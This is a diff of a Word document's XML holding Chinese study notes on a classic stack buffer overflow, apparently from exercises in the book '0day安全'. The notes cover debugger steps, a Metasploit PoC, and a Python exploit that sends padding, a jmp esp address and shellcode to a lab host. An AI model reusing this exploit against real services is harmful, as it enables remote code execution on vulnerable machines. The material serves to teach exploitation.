         </w:rPr>
-        <w:t>最后可以看到计算器弹出来了</w:t>
+        <w:t>可以看到解码的代码，所以，按照上一篇文章讲的，在</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>cld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>下断点然后F9就行了</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4891,7 +5906,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2966720"/>
             <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
-            <wp:docPr id="11" name="图片 11"/>
+            <wp:docPr id="10" name="图片 10"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4899,7 +5914,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="11" name="0day2-4-2.10.png"/>
+                    <pic:cNvPr id="10" name="0day2-4-2.9.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4935,296 +5950,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>这是用</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>最后可以看到计算器弹出来了</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>来加载</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>poc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">，现在咱们使用python实现溢出 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>#!</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/bin/python</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t># -*- coding:utf-8 -*-</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>import socket</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">import </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>struct</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>HOST = '192.168.1.103'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>PORT = 7777</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">s = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>socket.socket</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>socket.AF_INET,socket.SOCK_STREAM</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>s.connect</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>((HOST,PORT))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>shellcode=("\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>"\x53\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xFF</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>\x57\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xFC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>\x53\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xFF</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>\x57\xF8")</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jmpesp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>struct.pack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>("&lt;L",0x77E1F2C8)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">payload = 'a'* 204 + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jmpesp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> + shellcode</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>s.sendall</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(payload)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>s.close</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>()</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2966720"/>
             <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
-            <wp:docPr id="2" name="图片 2"/>
+            <wp:docPr id="11" name="图片 11"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5232,7 +5972,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="2" name="0day2-4-2.11.png"/>
+                    <pic:cNvPr id="11" name="0day2-4-2.10.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5268,51 +6008,320 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>运行，看到溢出的</w:t>
+        <w:t>这是用</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>jmp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>esp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>来加载</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>在返回地址处</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>poc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">，现在咱们使用python实现溢出 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>#!</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/bin/python</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"># -*- </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>coding:utf</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>-8 -*-</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>import socket</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>HOST = '192.168.1.103'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>PORT = 7777</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">s = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>socket.socket</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>socket.AF_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>INET,socket</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>.SOCK_STREAM</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>s.connect</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>((HOST,PORT))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>shellcode</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>=(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>"\x53\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xFF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\x57\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xFC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\x53\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>xFF</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>\x57\xF8")</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>jmpesp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>struct.pack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("&lt;L",0x77E1F2C8)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">payload = 'a'* 204 + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>jmpesp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> + shellcode</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>s.sendall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(payload)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>s.close</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>继续F8，来到shellcode的领空</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:noProof/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
@@ -5320,7 +6329,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2966720"/>
             <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
-            <wp:docPr id="8" name="图片 8"/>
+            <wp:docPr id="2" name="图片 2"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5328,7 +6337,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="8" name="0day2-4-2.12.png"/>
+                    <pic:cNvPr id="2" name="0day2-4-2.11.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5364,26 +6373,40 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>熟悉的</w:t>
+        <w:t>运行，看到溢出的</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>cld</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>F</w:t>
-      </w:r>
+        <w:t>jmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>9，看到了弹窗</w:t>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>在返回地址处</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>继续F8，来到shellcode的领空</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5396,7 +6419,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2966720"/>
             <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
-            <wp:docPr id="9" name="图片 9"/>
+            <wp:docPr id="8" name="图片 8"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5404,7 +6427,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="9" name="0day2-4-2.13.png"/>
+                    <pic:cNvPr id="8" name="0day2-4-2.12.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5440,16 +6463,87 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>回车后就成功退出了</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>熟悉的</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
+        <w:t>cld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>9，看到了弹窗</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5274310" cy="2966720"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
+            <wp:docPr id="9" name="图片 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="9" name="0day2-4-2.13.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="2966720"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>回车后就成功退出了</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
